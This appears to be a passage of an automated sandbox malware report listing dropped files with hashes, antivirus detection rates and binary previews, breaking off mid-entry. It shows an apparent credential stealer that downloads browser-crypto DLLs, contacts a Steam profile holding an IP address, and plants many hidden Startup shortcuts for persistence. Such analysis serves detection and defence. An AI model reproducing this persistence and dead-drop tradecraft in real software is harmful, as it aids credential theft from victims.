Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	2.133081594016209
Encrypted:	false
SSDEEP:	6:vtzOVg3F+X32wuhthQeOiGnkiluzlQjBC1lclfWd/G1i5lyEAht+hl/gd:vpmGSGxLjOL3l0QlkyulG1i7OIzG
MD5:	F5E41B8019653F9D890F856E7042676E
SHA1:	2937DAD4D83DA14F8C6304277924C45004718F99
SHA-256:	447721844CB2D6066639FDA761EC369AABC28E9CBF883F60702A09FCC9FDA51F
SHA-512:	8CEF4C6BDEE2CBA6601E2B7302B05C7B9F63725D9B0DDA6656263A82E5F54C030211DCF7D747C1A222206C9E84DBBA25988A4AC9A5365E7DD6153A78E7D8F577
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfcc9963ca_ldfsna[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	391072
Entropy (8bit):	7.987128579531616
Encrypted:	false
SSDEEP:	6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
MD5:	C7E7CFC3ED17AEF6C67C265389593EE3
SHA1:	44AAEA45A59F194F33FF435A430FCBD9E7434AD5
SHA-256:	0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
SHA-512:	6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z.....b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.......q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34879
Entropy (8bit):	5.398823245386745
Encrypted:	false
SSDEEP:	768:Mdpqme0Ih+3tAA6WGgefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2c:Md8me0Ih+3tAA6WGgeFhTBv++nIjBtPw
MD5:	43D1B8A5796FDCD95CC0AFFB6E54AEC7
SHA1:	B409959694AC95DFE1E99DED53C4D9D4D47C5394
SHA-256:	A0A53D0D24639EE8D666EC3043E1D2F8565C7C3F6EC30D27A11A1B27F9EB889F
SHA-512:	BA23DE6D7E850A012893A676D196F92D61EDE5ABCDC2B967AC98F0B334792FBEA3FC21083300B6059AB3A25E622DE9411F87765E4913B0152618E8B917792D37
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	2.2318272874720075
Encrypted:	false
SSDEEP:	6:vtzOVg3F+X32wx13C+t6kdlWOszUVMnfBrErV4rk/0kOp+ENJ/iHu/eGE/8d6y:vpmGSGwS+zlWOszrfurKrE0keTUeDWi
MD5:	EF8872DBB1E0DE26C4DAADB4E2BA1231
SHA1:	3D2931ACBF70418C2E5D997EFB92191A0AA1C370
SHA-256:	3C3473CD478011EF47A57B88EC6FDA2427C944085BBB929BBDE6ED88BA4CD624
SHA-512:	68AAFDCA48C3830D035FECEC97FECFBE11F7691561E53CD9B8C126BC0A9675056F807869F6248AD9E3D8F6DCF0A5D7CE8355490AEC7E2A09376AC0673A6392C4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1964072
Entropy (8bit):	7.999302542011407
Encrypted:	true
SSDEEP:	49152:h6qzkxccYdN/gvA5H+HQpZ4+Lue+2n8Zo+4i:h60cVvZQU+l+Oqo+7
MD5:	34EC7A5A9154386680A400B65CADA6CB
SHA1:	A97B1BF2C6AF2499C31510BD8C2EFCE3C50482F6
SHA-256:	F0BFCF5FC84FBBBE4B4A46CF51193A359CFDDBD79AA88F81D6DA4F5DAB79BA70
SHA-512:	3C675D631CD15283D3F258C90615C2BE10BCDB7F0405F4C3BA50A2C3B3F59F7533951F33BE75809E920B8D74FF56BBB83BF48E3EF9814621CF1DEA6CFBE55EEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$.f............................>.... ........@.. .......................@............`.....................................O.......................(&... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H....... ...............................................................w.K.....!......"h..&NJ$..m.UO....j.S....u.........YF...{AY..v.5:#I...5..,J..7+...:xJ&.m)/..u..Tj.=.....bU../E7...?.._.G\......z....d.{......$C=\|.Ne.,M4_.?^9e.....@.....Fd8.......:..........-Z.N.......J..4.H......D...]..0..+...[.hkZ...K.hR<2DC..+..=..~iNY+..py....,5..b%..0........^i..,...Nz...@hm.s.....d.w.B.4`..5..[o.l.Dr}@\.B...\...a....W.b.y`S0..0Rv.....l...-..(.1m7w1........5..

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.584122426061968
Encrypted:	false
SSDEEP:	384:6lHvmSg18ojO6SGQocpP8oD1wB6fct/oKH+egRtxgjw9M9ekamBrtEM3o0lfWZF1:kH+86O50oIFHZgRz19uhtno0lfWl
MD5:	6C7708B26AF0449F2CD1CAEF277DCE2E
SHA1:	1720B6892EF3825E39F7178584FFF858EC3F73E9
SHA-256:	3B3CB4613C52CC846462DF404477B19A9454DC8D43BFB67B68C6E090BB012A4B
SHA-512:	5231AA02B98EC9E816AE1FF01E63B085828CB9F3946CB432F5014A6475E4D1F39F04D664FC87DD01C3FE94A38771E4556E578A085644A17C0033D978788B2093
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..`............... ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text...._... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B........................H........E...9............................................................((....s..........(3...2.{....(....2.{....(....6.\|.....(4...6.\|.....(4...6.\|.....(4...R.sF...%oG....`oH...F.(I...(J...(...+..oN...%:....&.(O....{.....oP...Z.{!...r...p(....([...2.{#...(>...6.\|%....(4...6.\|)....(4...6.\|-....(4...6.\|5....(4...6.\|9....(4....(h...(...+.rw..p(.....<...r...p(.....=...sm....>....s=....?.....on...6.\|E....(4...6.\|L....(4...6.\|V....(....6.\|Y....(....*6.\|]

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe:Zone.Identifier

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.584122426061968
Encrypted:	false
SSDEEP:	384:6lHvmSg18ojO6SGQocpP8oD1wB6fct/oKH+egRtxgjw9M9ekamBrtEM3o0lfWZF1:kH+86O50oIFHZgRz19uhtno0lfWl
MD5:	6C7708B26AF0449F2CD1CAEF277DCE2E
SHA1:	1720B6892EF3825E39F7178584FFF858EC3F73E9
SHA-256:	3B3CB4613C52CC846462DF404477B19A9454DC8D43BFB67B68C6E090BB012A4B
SHA-512:	5231AA02B98EC9E816AE1FF01E63B085828CB9F3946CB432F5014A6475E4D1F39F04D664FC87DD01C3FE94A38771E4556E578A085644A17C0033D978788B2093
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..`............... ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text...._... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B........................H........E...9............................................................((....s..........(3...2.{....(....2.{....(....6.\|.....(4...6.\|.....(4...6.\|.....(4...R.sF...%oG....`oH...F.(I...(J...(...+..oN...%:....&.(O....{.....oP...Z.{!...r...p(....([...2.{#...(>...6.\|%....(4...6.\|)....(4...6.\|-....(4...6.\|5....(4...6.\|9....(4....(h...(...+.rw..p(.....<...r...p(.....=...sm....>....s=....?.....on...6.\|E....(4...6.\|L....(4...6.\|V....(....6.\|Y....(....*6.\|]

C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:NDM:S
MD5:	D096099EDA436B8531C1F646F1D6789B
SHA1:	0160994311D697E7C6E624CB3F5F50F365E30B71
SHA-256:	BA98BBA58E5460793BD93A10F68A8AFAD758EEF25535B145C1C9B797BC4688BF
SHA-512:	157AC2227F9528791D3F55DAF36E7D560B1539B1516B3E8C2DB0F278CC85917F9729C11FAECDF4A9BA3C13772EC4A32A4654C098BB42C15943B90B8878AA120D
Malicious:	false
Preview:	1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_063fb7da2c854bc59f435edaf2f70920.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:02 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949777509980551
Encrypted:	false
SSDEEP:	24:8PPA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PPer0R5rRvggyF
MD5:	BACDF486DF5D6664638236981DFA7A7B
SHA1:	D960DD1928061FAECB0F259E3AD062755E6307C7
SHA-256:	FA8DDCE8F95EEB918D0F5EB2395B93C21DF373554BCC8186EF5C2EDA17D67FE9
SHA-512:	AF693B466EADF74C76BE79DFBE8C6BDBE0D9AD2EB6B6E770A643903E05FFA15F330CF68F5DA808C443044811C1092337C9AB4765F0C440ECED93D1F698EC9366
Malicious:	false
Preview:	L..................F...."...o.k...._>.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_08d9ba422859475badad9504b252ee54.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:57 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.943663490995035
Encrypted:	false
SSDEEP:	24:8PVA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PVer0R5rRvggyF
MD5:	91E6EC99CF56CCCC8E7C32B8A5B999C6
SHA1:	FB34630DB8EE27E2DADE330E933E91049EC254C0
SHA-256:	108453EF5DE53CFDBC5C83DE61AF81EEDDB87B445DC68EA0FABE7A11251F8DA7
SHA-512:	6E57098FC9892370D29A07BC34134E0CE8E1D05FB4BAE664DA3325C52B5C6D44F7018F105F17C3F348E17C0CFA96F5F775AD335C0BBE3CAF90F01DC76C81E03D
Malicious:	false
Preview:	L..................F...."...o.k....4.D......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0b66fbb85bd44e25aaa067ae7db445e2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:59 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.952994484982503
Encrypted:	false
SSDEEP:	24:8PdaFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PdaFr0ROOxrRvggyF
MD5:	0399428A378244A57E9BE3759FEE50C8
SHA1:	0AC7C942231AA66044A670136894458F30CD5A9C
SHA-256:	B307119EB52E35E0C33D58AC6B638516EB6DDF6C523F7EA4AEB5041B48F9F50C
SHA-512:	3FD86F29DE119CB33ACFE5FFF964222001963649FC716B58B16BB35E62EEE0E5298AA4C5AD0903943F6D789B127F50BE371C4C0799B9DFF8BE4856F5C0D36368
Malicious:	false
Preview:	L..................F...."...o.k...........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10503dd545d3491b9cd25f874aebd985.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:19 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.946525175073553
Encrypted:	false
SSDEEP:	24:8P9YA3pd+E0R8gKDRNglhW8Apfv/42eVvqyFm:8P9Yer0RYrRvggyF
MD5:	8F5640FD50739734FC9BCD492BCA9F2D
SHA1:	24942C747A41B7922A7D46CF8232C4679BFBC347
SHA-256:	BCEA348E03AC2E9D8F05ED780F770B1FED5CF1B73EECB3B930BF813629832D97
SHA-512:	6E6C9793C080BE2C8AD0D8A052DBF243F063D9187305CFFB818903DAF498F84D721DCB11CE3AAB697059F79A6D238D81D04CD723EE13E1820CBD2BDBFC485D7D
Malicious:	false
Preview:	L..................F...."...o.k.....<4......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYJ=..Temp..:......CW.^BYJ=....l......................bL.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_107fa4e9473249e5ab5f0795712c2553.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:10 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.956172935187028
Encrypted:	false
SSDEEP:	24:8PS+GeA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8Pkeer0RSrRvggyF
MD5:	8C689CC544FF2F5CFD64CFC8742A4E94
SHA1:	B3618DF1EA6683A21312956060A69570ABE1BC08
SHA-256:	AC69ECB2F23E5CAE0454AF4E9AAEDD62772A8E0023399C8A99702D3CFE561F24
SHA-512:	71C1A0D49BE0399E2448CF3C0219C8AEDEEF6A9EDEB18242B3242965217A83922214B0D933B6E37A9CA8D18C75A985DEB5164B7FE3ADA25272C527669201BD40
Malicious:	false
Preview:	L..................F...."...o.k......s.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1289f75c78f24a42a886ea2c379aeea8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:50 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.954699367780932
Encrypted:	false
SSDEEP:	24:8P19Y/pd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8P19Y/r0ROOxrRvggyF
